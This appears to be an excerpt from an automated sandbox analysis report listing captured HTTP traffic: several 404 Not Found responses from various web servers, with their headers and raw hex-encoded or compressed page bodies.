5c 80 6c ad 73 7f c0 09 19 8a 52 94 7c 13 88 5f b4 87 23 f9 d3 7a 5c af 3e c4 a8 cf 0c 64 07 f8 6d af 3b f8 42 a3 46 ff 84 92 8d 46 cd 45 54 8c af 01 fe af 10 1c d1 1a 2f 02 ca 65 48 60 fd 81 d2 6a 10 58 03 db 43 40 29 15 9f f0 79 e2 42 1e bc bf b4 74 b4 68 76 0c f9 68 74 02 da 3a dd d1 0a f8 4e 78 06 82 d6 fb e6 7e 6d ea 7d d3 b6 eb 7a df 42 d9 d6 fb 55 59 36 f5 7e 75 ab ef a6 86 8c 7a 1d 7d 7b 1a fc dd 7c 59 cd 51 27 6c 5a fd 3a ca 35 75 c6 88 5
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://vintagewins.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 15:38:06 GMTserver: LiteSpeedData Raw: 64 37 63 0d 0a d0 66 23 a2 a2 f5 43 22 8a f9 00 68 a4 2c 9c bf 3f 42 86 b9 ff 96 a9 7f 8e 2f 27 4c 67 64 48 10 92 ed ac 72 49 db bf 2c 5b 94 e9 60 f4 24 93 20 d0 87 e7 6d 54 6d 36 c3 fe f9 bc 94 be e4 64 46 92 0b c6 29 af 6f 86 e2 65 3d a1 f8 0c 6c 49 f9 bf fd be 9d 8e 58 0c 54 d3 90 48 9c 4e 93 34 f3 66 d6 1f e2 be 62 f3 e6 8e ac a8 fc 5d cc 56 4c 20 89 67 22 f9 2f 62 92 a8 94 b0 11 5a 63 1b 5b a7 9f 25 2c 18 b5 7d 81 aa 53 91 91 63 b0 23 d7 a0 92 e3 ba a2 58 81 56 44 09 70 ff 38 7b bb c3 de f5 5e d5 bd a2 e0 f3 3f 7f 07 b4 f5 21 7f 49 bf 78 b0 b6 bb e8 df ec 74 4c 80 8a fe 0f 3c 75 3b cc eb 1e 14 4d 38 01 28 6b e4 1f d5 03 29 36 22 08 f2 a7 ef de f2 64 b4 03 b5 c4 f4 e2 9c f5 af 24 82 53 74 88 a1 b5 0e de b8 7d ce 5d 3f 74 32 c4 ae 38 b5 be 58 c2 9d 9e f5 dd 56 9b d7 8d 3d 07 eb 51 77 70 b4 3e cd f1 7f 2d a7 de c5 c1 c8 61 37 e0 78 1a b4 e8 e0 f1 17 dd 01 f1 01 49 37 5b 8b cc de dc af 96 cb 0d 81 67 da 4e b3 7e 52 e5 6f 11 c3 36 60 5a 84 b6 a1 45 af 4f b9 ed 75 07 f9 ff c0 27 84 63 35 03 8d 36 0b 52 3c ce d8 b5 59 34 3e e5 73 7c bf 11 cd 6e c1 72 d0 8b a3 02 c0 17 d9 06 8f 49 76 21 74 0e f4 60 a1 43 40 93 c2 e9 1a 8d 36 f8 22 49 b0 e1 36 49 43 73 05 c8 57 00 4d 7c 04 97 64 fb 9f 6a 01 9a 82 52 2f f7 cf 43 df 83 c7 c4 06 49 f3 16 7e 44 d2 3f 72 71 47 1f 67 c5 25 29 ce 32 91 cb 62 36 c7 fc 57 f9 f1 38 40 1f 5e ec ef 80 68 7d 97 88 22 23 dd ea 04 7f 46 47 2b 26 1a ac 8b ba 48 f2 28 43 ec ea 1f f7 78 ab 0b 13 22 d4 05 82 af 58 17 cb 1b 59 ca 75 5d dc ad 4e 77 ab ba a0 82 c2 09 69 45 67 c8 f1 04 08 9a 0e 1d ce 15 e9 d0 6d 37 a6 43 f7 e5 61 44 3a b4 16 f6 d1 00 ad 46 6a 82 37 1a 59 31 68 20 96 79 11 b7 bb 2e 8e 43 5e 16 6d a8 8b 97 34 11 05 e0 fa f3 08 0e 74 02 d9 5b 2f 5f d2 bb 03 44 75 2b 6f e4 0d 9d a6 cd ac b8 9c 37 1f 61 5f 6b 1d 10 9b 88 de 63 c8 9b 29 70 0f 0d b9 2c 66 f3 df 21 75 c8 ac f0 7c 3c e8 48 82 48 02 36 6e de 89 61 c0 47 8c 67 f7 35 a8 c6 26 16 fd fd 01 09 53 05 a2 42 33 ab 6a 63 09 97 3d f2 bd 0b 3f b7 8c 4f 9b 04 29 d9 e0 7f c7 10 75 07 32 01 7e 8b d0 b3 20 be fb fd e7 9f 64 c2 68 7d 67 db 33 43 ce a7 fa 61 cd 38 4d 2c f4 75 60 20 50 78 3e 82 6c 28 fb 22 7e 03 83 ac 14 a5 00 69 b4 3f e8 24 8b 2b 3a 89 b4 b2 79 51 5c 80 6c ad 73 7f c0 09 19 8a 52 94 7c 13 88 5f b4 87 23 f9 d3 7a 5c af 3e c4 a8 cf 0c 64 07 f8 6d af 3b f8 42 a3 46 ff 84 92 8d 46 cd 45 54 8c af 01 fe af 10 1c d1 1a 2f 02 ca 65 48 60 fd 81 d2 6a 10 58 03 db 43 40 29 15 9f f0 79 e2 42 1e bc bf b4 74 b4 68 76 0c f9 68 74 02 da 3a dd d1 0a f8 4e 78 06 82 d6 fb e6 7e 6d ea 7d d3 b6 eb 7a df 42 d9 d6 fb 55 59 36 f5 7e 75 ab ef a6 86 8c 7a 1d 7d 7b 1a fc dd 7c 59 cd 51 27 6c 5a fd 3a ca 35 75 c6 88 5
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:14 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:16 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1KfYUODC9rRl6oCVbOiEn1Atas4taJDBfsZofnl3UtmUkX%2BOwItBL%2BE76nNUUAhQbRYxewhwV%2BXKcUw%2BV6Ki85DEBAA1TnKZArLh4pmhQWZXkTcAO2WRvSWipnUgql6V4kb%2Btvi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d7f6751bd389ec-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 89 86 84 16 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:38:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1jK54NQaEt9%2Bv7Nh1F4OqbZfDMN03EodjRGAd5%2BLfRUGpKR9Mvq8Inu5Vb6ltXgHIK5wOiiktP6CR7wXdQnSSl1gKXy2cLwt1PXmywpTc9wf9LanB37zR6aeOBFnpQIjgL6qUkq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d7f685c9e8114d-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 